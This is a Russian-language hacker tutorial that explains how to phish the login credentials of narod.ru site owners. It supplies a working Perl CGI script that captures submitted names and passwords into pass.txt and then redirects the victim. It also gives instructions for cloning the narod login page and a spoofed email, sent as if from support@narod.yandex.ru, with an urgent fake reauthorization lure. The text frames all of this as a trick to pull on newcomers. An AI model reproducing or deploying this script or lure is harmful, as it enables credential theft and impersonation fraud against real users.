Основа статьи
это социальная инженерия, о которой уже было
написано не мало. Не буду повторяться. Этот трюк
можно провести со всеми новичками в сети
Интернет. А рассматривать мы его будем уже на
«банальном» хостинге narod.ru.(Повторюсь: его
можно проделать на любом бесплатном хостинге, да
даже и на платном можно попробовать ;) Начнём. Для
проведения нижеописанных действий вам
понадобятся:
1. Мозги
2. Руки
3.
Хостинг с поддержкой CGI
4. Небольшое знание
HTML
И так ищем жертву… У нас она
будет xxx.narod.ru. Вообще для этого случая
нужно искать не заброшенный сайт. И чтобы в
контактах было мыло типа xxx@narod.ru Теперь
нагло сдираем face народа ;) Подправляем его,
как надо,
вставляем туда форму:
Ещё надо написать write.cgi:
&GetFormInput; $name=$field{'name'};
$pass=$field{'pass'};
sub GetFormInput {
(*fval) = @_ if @_ ;
local ($buf);
if ($ENV{'REQUEST_METHOD'} eq 'POST') {
read(STDIN,$buf,$ENV{'CONTENT_LENGTH'});
}
else {
$buf=$ENV{'QUERY_STRING'};
}
if ($buf eq "") {
return 0 ;
}
else {
@fval=split(/&/,$buf);
foreach $i (0 .. $#fval){
($name,$val)=split (/=/,$fval[$i],2);
$val=~tr/+/ /;
$val=~ s/%(..)/pack("c",hex($1))/ge;
$name=~tr/+/ /;
$name=~ s/%(..)/pack("c",hex($1))/ge;
if (!defined($field{$name})) {
$field{$name}=$val;
}
else {
$field{$name} .= ",$val";
}
}
}
return 1;
}
open (OUTFILE, ">>pass.txt");
print OUTFILE "$name";
print OUTFILE "
$pass";
print OUTFILE "
=======END=======
";
close (OUTFILE);
print "Location: http://your_redirect_URL
" ;
Последняя строчка это перенаправление. Лучше послать на главную
страницу народа. Всё наш сайт мы подготовили. ;)
Теперь пишем этому "карапузу" (прим. Eraser'a : телепузу =)) письмо с
анонимного мыла от support@narod.yandex.ru вида: "Здравствуйте ваш сайт
пытались взломать и вам срочно не позже чем через 96 часов
надо пройти повторную авторизацию. Идите по ссылке (ага вот тута он и
отдаст нам пароль) а ссылочка, то вы скажите видно будет, что не
народовская... А я скажу вам нифига... А зачем нам nslookup? Вот так
вот. ;) короче ссылка будет вида: IP_ВАШЕГО_САЙТА/ sign.html . Усё
готово.. теперь токо надо ждать ;).
Дополнение:
В доставание пароля вам поможет ваша фантазия при написании письма лопуху…
Использованы материалы сайта www.dreamprogs.ru
| 
